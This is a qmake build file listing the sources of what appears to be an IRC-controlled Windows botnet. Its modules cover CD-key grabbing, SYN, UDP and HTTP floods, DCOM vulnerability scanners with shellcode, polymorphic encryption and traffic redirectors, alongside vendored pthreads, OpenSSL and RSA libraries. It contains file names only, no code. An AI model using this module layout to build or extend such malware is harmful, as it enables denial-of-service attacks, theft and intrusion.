TEMPLATE = app
CONFIG += console c++11
CONFIG -= app_bundle
CONFIG -= qt

SOURCES += \
    configs/config-sample.cpp \
    crypt/main.cpp \
    getmd5/main.cpp \
    bot.cpp \
    cdkeygrab.cpp \
    cmdline.cpp \
    commands.cpp \
    config.cpp \
    consdbg.cpp \
    crypter.cpp \
    cstring.cpp \
    cthread.cpp \
    cvar.cpp \
    dcom2scanner.cpp \
    dcomscanner.cpp \
    ddos.cpp \
    httpflood.cpp \
    installer.cpp \
    irc.cpp \
    ircgate.cpp \
    junoflood.cpp \
    locscanner.cpp \
    mac.cpp \
    mainctrl.cpp \
    nbscanner.cpp \
    p2p.cpp \
    pingflood.cpp \
    polymorph.cpp \
    random.cpp \
    redir_gre.cpp \
    redir_http.cpp \
    redir_socks.cpp \
    redir_tcp.cpp \
    redirect.cpp \
    rsalib.cpp \
    scanner.cpp \
    sdcompat.cpp \
    shellcode.cpp \
    ssllib.cpp \
    synflood.cpp \
    udpflood.cpp \
    utility.cpp \
    wdscanner.cpp \
    ftplib/ftplib.c \
    getmd5/md5c.c \
    getmd5/r_random.c \
    lib/pthreads/win32/attr.c \
    lib/pthreads/win32/barrier.c \
    lib/pthreads/win32/cancel.c \
    lib/pthreads/win32/cleanup.c \
    lib/pthreads/win32/condvar.c \
    lib/pthreads/win32/create.c \
    lib/pthreads/win32/dll.c \
    lib/pthreads/win32/errno.c \
    lib/pthreads/win32/exit.c \
    lib/pthreads/win32/fork.c \
    lib/pthreads/win32/global.c \
    lib/pthreads/win32/misc.c \
    lib/pthreads/win32/mutex.c \
    lib/pthreads/win32/nonportable.c \
    lib/pthreads/win32/private.c \
    lib/pthreads/win32/pthread.c \
    lib/pthreads/win32/pthread_attr_destroy.c \
    lib/pthreads/win32/pthread_attr_getdetachstate.c \
    lib/pthreads/win32/pthread_attr_getinheritsched.c \
    lib/pthreads/win32/pthread_attr_getschedparam.c \
    lib/pthreads/win32/pthread_attr_getschedpolicy.c \
    lib/pthreads/win32/pthread_attr_getscope.c \
    lib/pthreads/win32/pthread_attr_getstackaddr.c \
    lib/pthreads/win32/pthread_attr_getstacksize.c \
    lib/pthreads/win32/pthread_attr_init.c \
    lib/pthreads/win32/pthread_attr_setdetachstate.c \
    lib/pthreads/win32/pthread_attr_setinheritsched.c \
    lib/pthreads/win32/pthread_attr_setschedparam.c \
    lib/pthreads/win32/pthread_attr_setschedpolicy.c \
    lib/pthreads/win32/pthread_attr_setscope.c \
    lib/pthreads/win32/pthread_attr_setstackaddr.c \
    lib/pthreads/win32/pthread_attr_setstacksize.c \
    lib/pthreads/win32/pthread_barrier_destroy.c \
    lib/pthreads/win32/pthread_barrier_init.c \
    lib/pthreads/win32/pthread_barrier_wait.c \
    lib/pthreads/win32/pthread_barrierattr_destroy.c \
    lib/pthreads/win32/pthread_barrierattr_getpshared.c \
    lib/pthreads/win32/pthread_barrierattr_init.c \
    lib/pthreads/win32/pthread_barrierattr_setpshared.c \
    lib/pthreads/win32/pthread_cancel.c \
    lib/pthreads/win32/pthread_cond_destroy.c \
    lib/pthreads/win32/pthread_cond_init.c \
    lib/pthreads/win32/pthread_cond_signal.c \
    lib/pthreads/win32/pthread_cond_wait.c \
    lib/pthreads/win32/pthread_condattr_destroy.c \
    lib/pthreads/win32/pthread_condattr_getpshared.c \
    lib/pthreads/win32/pthread_condattr_init.c \
    lib/pthreads/win32/pthread_condattr_setpshared.c \
    lib/pthreads/win32/pthread_delay_np.c \
    lib/pthreads/win32/pthread_detach.c \
    lib/pthreads/win32/pthread_equal.c \
    lib/pthreads/win32/pthread_exit.c \
    lib/pthreads/win32/pthread_getconcurrency.c \
    lib/pthreads/win32/pthread_getschedparam.c \
    lib/pthreads/win32/pthread_getspecific.c \
    lib/pthreads/win32/pthread_getw32threadhandle_np.c \
    lib/pthreads/win32/pthread_join.c \
    lib/pthreads/win32/pthread_key_create.c \
    lib/pthreads/win32/pthread_key_delete.c \
    lib/pthreads/win32/pthread_kill.c \
    lib/pthreads/win32/pthread_mutex_destroy.c \
    lib/pthreads/win32/pthread_mutex_init.c \
    lib/pthreads/win32/pthread_mutex_lock.c \
    lib/pthreads/win32/pthread_mutex_timedlock.c \
    lib/pthreads/win32/pthread_mutex_trylock.c \
    lib/pthreads/win32/pthread_mutex_unlock.c \
    lib/pthreads/win32/pthread_mutexattr_destroy.c \
    lib/pthreads/win32/pthread_mutexattr_getkind_np.c \
    lib/pthreads/win32/pthread_mutexattr_getpshared.c \
    lib/pthreads/win32/pthread_mutexattr_gettype.c \
    lib/pthreads/win32/pthread_mutexattr_init.c \
    lib/pthreads/win32/pthread_mutexattr_setkind_np.c \
    lib/pthreads/win32/pthread_mutexattr_setpshared.c \
    lib/pthreads/win32/pthread_mutexattr_settype.c \
    lib/pthreads/win32/pthread_num_processors_np.c \
    lib/pthreads/win32/pthread_once.c \
    lib/pthreads/win32/pthread_rwlock_destroy.c \
    lib/pthreads/win32/pthread_rwlock_init.c \
    lib/pthreads/win32/pthread_rwlock_rdlock.c \
    lib/pthreads/win32/pthread_rwlock_timedrdlock.c \
    lib/pthreads/win32/pthread_rwlock_timedwrlock.c \
    lib/pthreads/win32/pthread_rwlock_tryrdlock.c \
    lib/pthreads/win32/pthread_rwlock_trywrlock.c \
    lib/pthreads/win32/pthread_rwlock_unlock.c \
    lib/pthreads/win32/pthread_rwlock_wrlock.c \
    lib/pthreads/win32/pthread_rwlockattr_destroy.c \
    lib/pthreads/win32/pthread_rwlockattr_getpshared.c \
    lib/pthreads/win32/pthread_rwlockattr_init.c \
    lib/pthreads/win32/pthread_rwlockattr_setpshared.c \
    lib/pthreads/win32/pthread_self.c \
    lib/pthreads/win32/pthread_setcancelstate.c \
    lib/pthreads/win32/pthread_setcanceltype.c \
    lib/pthreads/win32/pthread_setconcurrency.c \
    lib/pthreads/win32/pthread_setschedparam.c \
    lib/pthreads/win32/pthread_setspecific.c \
    lib/pthreads/win32/pthread_spin_destroy.c \
    lib/pthreads/win32/pthread_spin_init.c \
    lib/pthreads/win32/pthread_spin_lock.c \
    lib/pthreads/win32/pthread_spin_trylock.c \
    lib/pthreads/win32/pthread_spin_unlock.c \
    lib/pthreads/win32/pthread_testcancel.c \
    lib/pthreads/win32/pthread_timechange_handler_np.c \
    lib/pthreads/win32/pthread_win32_attach_detach_np.c \
    lib/pthreads/win32/ptw32_calloc.c \
    lib/pthreads/win32/ptw32_callUserDestroyRoutines.c \
    lib/pthreads/win32/ptw32_cond_check_need_init.c \
    lib/pthreads/win32/ptw32_decrease_semaphore.c \
    lib/pthreads/win32/ptw32_getprocessors.c \
    lib/pthreads/win32/ptw32_increase_semaphore.c \
    lib/pthreads/win32/ptw32_InterlockedCompareExchange.c \
    lib/pthreads/win32/ptw32_is_attr.c \
    lib/pthreads/win32/ptw32_mutex_check_need_init.c \
    lib/pthreads/win32/ptw32_new.c \
    lib/pthreads/win32/ptw32_processInitialize.c \
    lib/pthreads/win32/ptw32_processTerminate.c \
    lib/pthreads/win32/ptw32_reuse.c \
    lib/pthreads/win32/ptw32_rwlock_cancelwrwait.c \
    lib/pthreads/win32/ptw32_rwlock_check_need_init.c \
    lib/pthreads/win32/ptw32_spinlock_check_need_init.c \
    lib/pthreads/win32/ptw32_threadDestroy.c \
    lib/pthreads/win32/ptw32_threadStart.c \
    lib/pthreads/win32/ptw32_throw.c \
    lib/pthreads/win32/ptw32_timespec.c \
    lib/pthreads/win32/ptw32_tkAssocCreate.c \
    lib/pthreads/win32/ptw32_tkAssocDestroy.c \
    lib/pthreads/win32/rwlock.c \
    lib/pthreads/win32/sched.c \
    lib/pthreads/win32/sched_get_priority_max.c \
    lib/pthreads/win32/sched_get_priority_min.c \
    lib/pthreads/win32/sched_getscheduler.c \
    lib/pthreads/win32/sched_setscheduler.c \
    lib/pthreads/win32/sched_yield.c \
    lib/pthreads/win32/sem_close.c \
    lib/pthreads/win32/sem_destroy.c \
    lib/pthreads/win32/sem_getvalue.c \
    lib/pthreads/win32/sem_init.c \
    lib/pthreads/win32/sem_open.c \
    lib/pthreads/win32/sem_post.c \
    lib/pthreads/win32/sem_post_multiple.c \
    lib/pthreads/win32/sem_timedwait.c \
    lib/pthreads/win32/sem_trywait.c \
    lib/pthreads/win32/sem_unlink.c \
    lib/pthreads/win32/sem_wait.c \
    lib/pthreads/win32/semaphore.c \
    lib/pthreads/win32/signal.c \
    lib/pthreads/win32/spin.c \
    lib/pthreads/win32/sync.c \
    lib/pthreads/win32/tsd.c \
    lib/pthreads/win32/w32_CancelableWait.c \
    rsa/desc.c \
    rsa/digit.c \
    rsa/md2c.c \
    rsa/md5c.c \
    rsa/nn.c \
    rsa/prime.c \
    rsa/r_dh.c \
    rsa/r_encode.c \
    rsa/r_enhanc.c \
    rsa/r_keygen.c \
    rsa/r_random.c \
    rsa/r_stdlib.c \
    rsa/rsa.c

HEADERS += \
    ftplib/ftplib.h \
    getmd5/global.h \
    getmd5/md5.h \
    getmd5/r_random.h \
    getmd5/rsaref.h \
    lib/openssl/linux/include/openssl/aes.h \
    lib/openssl/linux/include/openssl/asn1.h \
    lib/openssl/linux/include/openssl/asn1_mac.h \
    lib/openssl/linux/include/openssl/asn1t.h \
    lib/openssl/linux/include/openssl/bio.h \
    lib/openssl/linux/include/openssl/blowfish.h \
    lib/openssl/linux/include/openssl/bn.h \
    lib/openssl/linux/include/openssl/buffer.h \
    lib/openssl/linux/include/openssl/cast.h \
    lib/openssl/linux/include/openssl/comp.h \
    lib/openssl/linux/include/openssl/conf.h \
    lib/openssl/linux/include/openssl/conf_api.h \
    lib/openssl/linux/include/openssl/crypto.h \
    lib/openssl/linux/include/openssl/des.h \
    lib/openssl/linux/include/openssl/des_old.h \
    lib/openssl/linux/include/openssl/dh.h \
    lib/openssl/linux/include/openssl/dsa.h \
    lib/openssl/linux/include/openssl/dso.h \
    lib/openssl/linux/include/openssl/e_os2.h \
    lib/openssl/linux/include/openssl/ebcdic.h \
    lib/openssl/linux/include/openssl/ec.h \
    lib/openssl/linux/include/openssl/engine.h \
    lib/openssl/linux/include/openssl/err.h \
    lib/openssl/linux/include/openssl/evp.h \
    lib/openssl/linux/include/openssl/hmac.h \
    lib/openssl/linux/include/openssl/idea.h \
    lib/openssl/linux/include/openssl/krb5_asn.h \
    lib/openssl/linux/include/openssl/kssl.h \
    lib/openssl/linux/include/openssl/lhash.h \
    lib/openssl/linux/include/openssl/md2.h \
    lib/openssl/linux/include/openssl/md4.h \
    lib/openssl/linux/include/openssl/md5.h \
    lib/openssl/linux/include/openssl/mdc2.h \
    lib/openssl/linux/include/openssl/obj_mac.h \
    lib/openssl/linux/include/openssl/objects.h \
    lib/openssl/linux/include/openssl/ocsp.h \
    lib/openssl/linux/include/openssl/opensslconf.h \
    lib/openssl/linux/include/openssl/opensslv.h \
    lib/openssl/linux/include/openssl/ossl_typ.h \
    lib/openssl/linux/include/openssl/pem.h \
    lib/openssl/linux/include/openssl/pem2.h \
    lib/openssl/linux/include/openssl/pkcs12.h \
    lib/openssl/linux/include/openssl/pkcs7.h \
    lib/openssl/linux/include/openssl/rand.h \
    lib/openssl/linux/include/openssl/rc2.h \
    lib/openssl/linux/include/openssl/rc4.h \
    lib/openssl/linux/include/openssl/rc5.h \
    lib/openssl/linux/include/openssl/ripemd.h \
    lib/openssl/linux/include/openssl/rsa.h \
    lib/openssl/linux/include/openssl/safestack.h \
    lib/openssl/linux/include/openssl/sha.h \
    lib/openssl/linux/include/openssl/ssl.h \
    lib/openssl/linux/include/openssl/ssl2.h \
    lib/openssl/linux/include/openssl/ssl23.h \
    lib/openssl/linux/include/openssl/ssl3.h \
    lib/openssl/linux/include/openssl/stack.h \
    lib/openssl/linux/include/openssl/symhacks.h \
    lib/openssl/linux/include/openssl/tls1.h \
    lib/openssl/linux/include/openssl/tmdiff.h \
    lib/openssl/linux/include/openssl/txt_db.h \
    lib/openssl/linux/include/openssl/ui.h \
    lib/openssl/linux/include/openssl/ui_compat.h \
    lib/openssl/linux/include/openssl/x509.h \
    lib/openssl/linux/include/openssl/x509_vfy.h \
    lib/openssl/linux/include/openssl/x509v3.h \
    lib/pthreads/win32/implement.h \
    lib/pthreads/win32/need_errno.h \
    lib/pthreads/win32/pthread.h \
    lib/pthreads/win32/sched.h \
    lib/pthreads/win32/semaphore.h \
    rsa/des.h \
    rsa/digit.h \
    rsa/global.h \
    rsa/md2.h \
    rsa/md5.h \
    rsa/nn.h \
    rsa/prime.h \
    rsa/r_random.h \
    rsa/rsa.h \
    rsa/rsaref.h \
    bot.h \
    cdkeygrab.h \
    cmdbase.h \
    cmdline.h \
    cmdopt.h \
    commands.h \
    consdbg.h \
    crypter.h \
    cstring.h \
    cthread.h \
    cvar.h \
    dcom2scanner.h \
    dcomscanner.h \
    ddos.h \
    httpflood.h \
    installer.h \
    irc.h \
    ircgate.h \
    junoflood.h \
    locscanner.h \
    mac.h \
    main.h \
    mainctrl.h \
    message.h \
    nbscanner.h \
    p2p.h \
    pingflood.h \
    polymorph.h \
    random.h \
    redir_gre.h \
    redir_http.h \
    redir_socks.h \
    redir_tcp.h \
    redirect.h \
    resource.h \
    rsalib.h \
    scanner.h \
    sdcompat.h \
    shellcode.h \
    ssllib.h \
    synflood.h \
    udpflood.h \
    utility.h \
    wdscanner.h
